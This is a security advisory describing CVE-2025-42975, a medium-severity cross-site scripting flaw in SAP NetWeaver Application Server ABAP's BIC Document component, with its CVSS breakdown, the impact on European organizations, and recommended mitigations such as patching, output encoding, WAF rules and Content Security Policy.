CVE-2025-42975 is a medium-severity vulnerability affecting SAP NetWeaver Application Server ABAP, specifically the BIC Document component. The vulnerability is classified as CWE-79, which corresponds to improper neutralization of input during web page generation, commonly known as Cross-Site Scripting (XSS). This vulnerability allows an unauthenticated attacker to craft a malicious URL that embeds a script within the BIC Document application. When a victim clicks on this crafted URL, the malicious script executes in the victim's browser context. This execution enables the attacker to access or modify information related to the web client session, potentially compromising confidentiality and integrity of data displayed or handled by the web client. Notably, the vulnerability does not impact system availability. The affected versions include multiple releases of SAP NetWeaver Application Server ABAP and SEM-BW ranging from S4COREOP 104 through 108 and SEM-BW versions 600 through 748. The CVSS v3.1 base score is 6.1, indicating a medium severity level, with attack vector network (AV:N), low attack complexity (AC:L), no privileges required (PR:N), but requiring user interaction (UI:R). The scope is changed (S:C), meaning the vulnerability affects components beyond the vulnerable component itself. The impact on confidentiality and integrity is low (C:L/I:L), and availability is not affected (A:N). There are no known exploits in the wild at the time of publication, and no patches are currently linked, indicating that remediation may require vendor updates or configuration changes once available. This vulnerability is significant because SAP NetWeaver is widely used in enterprise environments for critical business processes, and exploitation could lead to unauthorized disclosure or modification of sensitive business data through client-side attacks.

For European organizations, the impact of CVE-2025-42975 can be considerable given the widespread adoption of SAP NetWeaver in sectors such as manufacturing, finance, logistics, and public administration. Successful exploitation could lead to unauthorized access to sensitive business information, including financial data, operational metrics, or personally identifiable information processed through the SAP web client interface. Although availability is not affected, the breach of confidentiality and integrity could result in regulatory non-compliance under GDPR, reputational damage, and potential financial losses. The requirement for user interaction (clicking a malicious link) means phishing or social engineering campaigns could be used to exploit this vulnerability, increasing risk in environments with less mature security awareness. The changed scope indicates that the impact may extend beyond the immediate vulnerable component, potentially affecting other integrated SAP modules or connected systems. Given SAP's role in critical infrastructure and enterprise resource planning, exploitation could disrupt business continuity indirectly through data manipulation or leakage. European organizations with extensive SAP deployments must therefore consider this vulnerability a significant risk vector, especially in industries with stringent data protection requirements.

To mitigate CVE-2025-42975 effectively, European organizations should implement a multi-layered approach: 1) Monitor SAP security advisories closely and apply vendor patches or updates as soon as they become available, prioritizing affected versions listed. 2) Implement strict input validation and output encoding on all user-supplied data within the SAP BIC Document application to neutralize malicious scripts. 3) Employ Web Application Firewalls (WAFs) with custom rules to detect and block suspicious URL patterns or script injections targeting SAP web interfaces. 4) Enhance user awareness training focused on phishing and social engineering to reduce the likelihood of users clicking malicious links. 5) Restrict access to SAP web applications through network segmentation and enforce strong authentication mechanisms, such as multi-factor authentication, to limit exposure. 6) Conduct regular security assessments and penetration testing on SAP environments to identify and remediate similar vulnerabilities proactively. 7) Utilize Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers accessing SAP web clients. 8) Review and harden SAP configuration settings to minimize attack surface, including disabling unnecessary web services or features. These targeted measures go beyond generic advice and address the specific nature of this XSS vulnerability in SAP NetWeaver.